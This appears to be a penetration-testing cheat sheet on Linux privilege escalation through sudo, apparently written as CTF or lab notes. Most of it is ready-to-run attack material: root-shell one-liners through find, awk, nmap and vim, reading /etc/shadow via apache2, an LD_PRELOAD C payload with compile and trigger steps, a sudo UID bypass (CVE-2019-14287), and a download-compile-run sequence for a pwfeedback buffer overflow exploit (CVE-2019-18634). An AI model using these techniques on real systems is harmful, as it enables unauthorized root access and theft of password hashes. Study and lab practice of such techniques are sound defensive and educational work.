# Sudo
## Enumeration
{% hint style="info" %}
Always check `sudo -l` at the beginning of the privilege escalation phase.
{% endhint %}
The command `sudo` allows the current user to execute certain commands as other users. To view a list of such commands:
```bash
sudo -l
```
In the trivial case, the current user can execute any command as any user:
In this case we can spawn a root shell directly:
```
/bin/bash -p
```
## Method 1: GTFOBins
For a privesc cheatsheet, check out GTFOBins:
{% embed url="" %}
GTFOBins
{% endembed %}
### **Examples**
If `find` is in `sudo -l`:
```
sudo find /bin -name nano -exec /bin/sh \;
```
If `awk` is in `sudo -l`:
```bash
sudo awk 'BEGIN {system("/bin/sh")}'
```
If `nmap` is in `sudo -l`:
```bash
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
```
If `vim` is in `sudo -l`:
```bash
sudo vim -c ':!/bin/sh'
```
## Method 2: Intended Functionality
### apache2
If `apache2` is in `sudo -l`, then we can read the root password hash from `/etc/shadow` by triggering an error:
```bash
sudo apache2 -f /etc/shadow
```
### wget
A `wget` privesc example:
{% embed url="" %}
wget privesc
{% endembed %}
## Method 3: LD\_PRELOAD
`LD_PRELOAD` is an environment variable that lists shared libraries with functions that override the standard set, just as `/etc/ld.so.preload` does. These are implemented by the loader `/lib/ld-linux.so`.
If `sudo -l` finds LD\_PRELOAD as well as some sudo command, for example, `/usr/sbin/apache2`:
```
env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2
```
then we can utilize this "feature" for privilege escalation. Store the following C program in `/tmp`:
{% code title="x.c" %}
```c
#include
#include
#include
void _init()
{
unsetenv("LD_PRELOAD"); // Unset env LD_PRELOAD
setgid(0); // Set GID to root
setuid(0); // Set UID to root
system("/bin/bash"); // Execute /bin/bash
}
```
{% endcode %}
Compile it:
```bash
gcc -fPIC -shared -o x.so x.c -nostartfiles
```
Trigger it with any sudo command (this command can be anything, here `apache2` is just an example):
```bash
sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2
```
Then we will get a root shell.
## Method 4: Attacking Sudo Itself
### CVE-2019-14287
{% embed url="" %}
sudo 1.8.27 - Security Bypass
{% endembed %}
If `sudo -l` shows we can execute `/bin/bash` as any user other than root:
```bash
(ALL, !root) /bin/bash
```
Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.
That means we can get a root shell using the following payload:
```bash
sudo -u#-1 /bin/bash
```
Test this CVE in TryHackMe:
{% embed url="" %}
Sudo Security Bypass - TryHackMe
{% endembed %}
### CVE-2019-18634
{% embed url="" %}
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
{% endembed %}
In `/etc/sudoers`, there is an option named `pwfeedback`, which is turned off by default. If it is turned on, Linux will give you "feedback" when you type password by showing a asterisk for each character you type.
In Sudo 1.8.25p, this `pwfeedback` option leads to buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:
```bash
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
```
Compile it:
```bash
gcc -o exploit exploit.c
```
Give permission and run it:
```bash
chmod +x exploit ; ./exploit
```
Test this CVE in TryHackMe:
{% embed url="" %}
Sudo Buffer Overflow - TryHackMe
{% endembed %}
## Challenge: TryHackMe - Simple CTF
{% embed url="" %}
TryHackMe - Simple CTF
{% endembed %}